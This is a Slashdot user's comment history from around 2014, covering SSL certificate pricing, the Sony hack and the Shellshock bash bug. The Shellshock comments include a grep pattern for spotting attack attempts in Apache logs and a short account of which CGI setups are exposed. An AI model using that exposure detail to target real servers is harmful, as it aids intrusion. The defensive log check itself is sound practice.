×

Announcing: Slashdot Deals - Explore geek apps, games, gadgets and more. (what is this?)

Thank you!

We are sorry to see you leave - Beta is different and we value the time you took to try it out. Before you decide to go, please take a look at some value-adds for Beta and learn more about it. Thank you for reading Slashdot, and for making the site better!

Comments

top

Google Proposes To Warn People About Non-SSL Web Sites

ArsenneLupin Re:Stupid (391 comments)

Huh. I didn't know that, as I only have ever done the individual verification. It's not uncommon for someone to wear many hats (i.e., to be affiliated with several organizations). It'd certainly be nice if their system allowed for a single individual account to switch between different "identities", so that one could issue certs for themselves or any number of organizations with which they're affiliated and which they've validated with StartSSL.

Indeed...

Have you suggested such an improvement to them?

Yes, of course. They wouldn't budge. Their suggestion: just use the "free" plan instead, there you can wear as many hats as you like (which I did... after this incident they never saw another cent from me). Weird way of promoting your business...

And that's another issue: they don't take any suggestions! For example: some (all?) of their automated mails are formatted as a single long line. I suggested to them that general usage is to stay below 78 characters per line. Should be easy to fix, as they probably use some kind of .txt template, where they could just insert a couple of breaks. Answer: well, at least our mails don't contain a virus (or something equally silly). Hey that's great! But it would be even nicer if the lines were shorter as well. A year afterwards, the issue was still not fixed.

Technically, yes, but policy-wise, no: Class 1 certs are not intended for commercial use.

Well, it's not commercial use, it's for several non-profits and one political party.

As you suspected, the $9 offering from PositiveSSL is for a single, non-wildcard, non-SAN certificate.

Yeah, that's the kind of certificate that you can for free from StartSSL (class 1)

NameCheap also sells Comodo PositiveSSL multi-domain certs [namecheap.com] for $30/year for up to 100 domains, which is quite a reasonable price.

Yeah, that would be reasonable. Can these domains be wildcard, or does each domain only have a single host?

Wildcard certs are also available [namecheap.com], with Comodo wildcards costing $94/year.

Interesting...

2 days ago
top

Google Proposes To Warn People About Non-SSL Web Sites

ArsenneLupin Re: Stupid (391 comments)

Yeah. Beer in Switzerland isn't cheap. :/

I know. So expensive that people cannot even afford mustard to put on their sausage along with it ...

2 days ago
top

Top Five Theaters Won't Show "The Interview" Sony Cancels Release

ArsenneLupin Re:Home of the brave? (580 comments)

... or maybe the theater owners (and Sony) do not actually believe the threats, but instead fear that many spectators might believe those threats, and performance on opening might be very lackluster... Better cancel it all along, and do it 2 weeks later when there are (hopefully...) no new threats.

3 days ago
top

Top Five Theaters Won't Show "The Interview" Sony Cancels Release

ArsenneLupin Re:Home of the brave? (580 comments)

Well actually, if you are going to be killed by a terrorist at some point during the day, you would have to wake up alive first.

The terrorist could conceivably kill you in your sleep, with a single shot at your head through your pillow...

3 days ago
top

Google Proposes To Warn People About Non-SSL Web Sites

ArsenneLupin Re:Malware (391 comments)

I see the value of the proposal: it is easy to inject malware inside a HTTP stream.

Only when the attacker is sitting on the path from the browser to the server. Not when listening in on the side-lines.

... and sitting on the path is the exact definition of man-in-the-middle, which allows to take advantage of poor certificates. And how many people properly understand certificates?

However, with only 33% of the sites that are SSL enabled, they are just going to show warnings everywhere, and users will quickly learn to ignore them.

Exactly. And once users are trained to ignore warnings, they will ignore them too if they are about bad certificates, so nothing is gained (see above).

3 days ago
top

Google Proposes To Warn People About Non-SSL Web Sites

ArsenneLupin Re:Stupid (391 comments)

StartSSL offers completely free-of-cost certificates that are widely recognized by browsers to individuals and non-commercial sites. $60/year gets you an ID-verified account and the ability to offer unlimited certificates (they only charge for the validation, certificates are free). A second $60 ($120 total) gets your organization verified, again with the ability to issue unlimited certs.

And if you do pay the $60, you can only manage a single legal entity. Which means, if you are the certificate manager of some organization, you can either get certificates in the name of that organizationation (after completing the paperwork and paying the additional $60), or for your own private sites, but not for both at once. Yes, after completing the paperwork for getting certificates for your organization, you lose the right to get certificates for yourself. Crazy, but true!

Oddly enough, if you don't pay anything at all ("class 1 certificates"), you can get certificates for several associations and yourself at once. Of course, then you can't get wildcards or SAN certificates, so you are forced to use SNI (more hassle to set up, and might not work with exotic browsers).

If, for some reason, that's not satisfactory, Comodo resellers like NameCheap offer PositiveSSL certs for less than $9/year. That's less than a beer at the local bar.

Wow, a place where beer is even more expensive than here in Luxembourg! But seriously, I guess the $9/year is for plain certificates, no wildcard and non SAN? In that case it would compete with StartSSL's free offering, rather than their $60 plan. If it actually does include wildcard certificates, I would be interested in details.

3 days ago
top

Verizon "End-to-End" Encrypted Calling Includes Law Enforcement Backdoor

ArsenneLupin Re:This should be free (166 comments)

And if the source and destination are clueless then an educated third party has to manage it.

... an educated and trustworthy third party. And that's where it becomes difficult...

4 days ago
top

Sony Pictures Computer Sytems Shut Down After Ransomware Hack

ArsenneLupin Re:oh goody (155 comments)

I really hope they don't pay!

I hope so too. That way, the hackers will release the files (the contents, not just the filenames), which contain enough juice to sink Sony Pictures (and possibly other parts of Sony too) for good.

about a month ago
top

Sony Pictures Computer Sytems Shut Down After Ransomware Hack

ArsenneLupin Re:Dear Sony, I am delighted! (155 comments)

every officer of the company needs to do the honorable thing and leave the company, leave the industry, and get a job more suited to their ethical and strategic skill set. Like flipping burgers, or arranging the sushi on the platter.

Are you sure these are appropriate jobs for Sonyscum? Personally, I wouldn't want to eat burgers laced with exlax, or sushi caught from the waters next to Fukushima...

about a month ago
top

"Barbie: I Can Be a Computer Engineer" Pulled From Amazon

ArsenneLupin Re:Fix a thumbdrive virus by doing WHAT??? (561 comments)

The suggestion in the book that it would be appropriate to plug a known-virus-infected USB thumbdrive into another computer in order to fix it seems totally crazy to me. Even if the second computer does have better security there's no guarantee the virus isn't a new one that hasn't made it into virus checker recognition databases yet...

Yeah, but you forgot an important detail... The suggestion was not just to plug it in to another computer, but to plug it into another computer that isn't yours. In case it does becomes infected, you just sneak away, and pretend that nothing happened...

But only if you're a boy. If you're a girl, you just keep sitting next to it and weep...

about a month ago
top

Rooftop Solar Could Reach Price Parity In the US By 2016

ArsenneLupin Re:They WILL FIght Back (516 comments)

Everybody knows wind turbines are eye sores.

They obscure all the lovely smoke stacks.

A couple of years back, the French complained that a new wind turbine field in Germany was spoiling the nice scenic view of the Chateau de Malbrouck (located just opposite the German-French border from that infamous field).

Unfortunately, they conveniently completely forgot what the Germans see when they look at the Chateau de Malbrouck

about a month ago
top

Apple Disables Trim Support On 3rd Party SSDs In OS X

ArsenneLupin Re:This isn't new (327 comments)

When you qualify it by saying, "always on third party SSDs", then it's not the same as "always" (unqualified).

But he did:

Apple has always disabled TRIM on those

So, what's your point?

about a month ago
top

Ask Slashdot: Single Sign-On To Link Google Apps and Active Directory?

ArsenneLupin Re:What the hell (168 comments)

If you are turning north from I-10 onto I-65, or if you are on I-65 and turning east or west onto I=10, you have already failed at taking the quickest was from anywhere to anywhere else.

Just looking at a map, while coming from North I-65 and going east on I-10 looks kinda nonsensical, going west doesn't look so bizarre. You'd use that connection when going from Montgomery to New Orleans, wouldn't you?

Or is that just a general comment that those roads tend to be congested, and are never the quickest way (no matter which way you turn?)

about a month and a half ago
top

"Police Detector" Monitors Emergency Radio Transmissions

ArsenneLupin Ambulances are using the same technology (215 comments)

In many places, Ambulances and firefighters are using the same technology. So expect some false positives...

about 2 months ago
top

How Nigeria Stopped Ebola

ArsenneLupin Re:Not the same thing at all. (381 comments)

The current panic underscores it as well - first people underreact and now they are overreacting.

The shwinesflu scare a couple of years ago may also be an explanation for the initial under-reaction...

about 2 months ago
top

Why the Trolls Will Always Win

ArsenneLupin Re:The more things change the more the stay the sa (728 comments)

"politic" meaning roughly in the original Greek "To shout down"

Bullshit. The word "politic" is derived from "polis", the Greek word for "city". So "politics" is the art of running a city (or city-state, as most cities were back then), not the art of shouting your opponent down...

about 2 months ago
top

Building a Honeypot To Observe Shellshock Attacks In the Real World

ArsenneLupin Just grep for () in your /var/log/apache2/referer. (41 comments)

If you run a web server of any kind, just grep for () in your /var/log/apache2/referer.log, and you'll see plenty of hits:
fgrep '()' /var/log/apache2/referer.log

... if not, maybe you're simply running a site that is too obscure?

about 3 months ago
top

Remote Exploit Vulnerability Found In Bash

ArsenneLupin Re:Only CGI scripts affected? (399 comments)

Oh I had the same thought....I mean, by the time an "attacker" is modifying arbitrary environment variables in your process,

Which is the case on most Apache Web server configs: the client has full control over the HTTP_REFERER and HTTP_USER_AGENT variables... And the exploit in question works with any environment variable, including those 2.

Well, starting from here, you are vulnerable as soon as:

  1. You have a CGI script written as a #!/bin/bash script on your system
  1. You have /bin/sh symlinked to /bin/bash (used to be common in many Linux distribution), so as soon as a script calls system(), /bin/bash gets executed, along with the scripts full environment...

about 3 months ago
top

Remote Exploit Vulnerability Found In Bash

ArsenneLupin Re:Really? Using bash for CGI? (399 comments)

The problem affects any CGI that *calls* bash, which means any call to system() in any language is going to cause a problem.

Nowadays, on most systems, /bin/sh is a proper Bourne Shell (either ash or dash), and no longer bash. So system() should no longer be an issue, but explicitly calling bash still would be...

about 3 months ago

Submissions

top

Luxembourg PM Juncker to resign over spy scandal

ArsenneLupin ArsenneLupin writes  |  about a year and a half ago

ArsenneLupin (766289) writes "Luxembourg will hold new elections after Prime Minister Jean-Claude Juncker announced he would resign following a secret service scandal.

Mr Juncker, Europe's longest-serving head of government, told parliament he would step down on Thursday."

Link to Original Source
top

Luxembourg Prime Minister Resigns over Spying Scandal

ArsenneLupin ArsenneLupin writes  |  about a year and a half ago

ArsenneLupin (766289) writes "Luxembourg Prime Minister Jean-Claude Juncker, Europe's longest-serving leader, Wednesday said he would step down over a scandal involving the small country's small secret services, who were alleged to have created a "big mess" by indulging in a spate of misconduct on his (or rather: Mister Mille's...) watch.

When will president Obama follow suite?"

Link to Original Source
top

Pope Benedict XVI resigns due to old age

ArsenneLupin ArsenneLupin writes  |  about 2 years ago

ArsenneLupin (766289) writes "In a statement released by the Catholic Church, Benedict VXI said that “after having repeatedly examined my conscience before God, I have come to the certainty that my strengths, due to an advanced age, are no longer suited to an adequate exercise of the Petrine ministry.”
Hopefully the new pope (if there will be any...) will be more open-minded and tolerant of minorities"

Link to Original Source

Journals

ArsenneLupin has no journal entries.

Slashdot Login

Need an Account?

Forgot your password?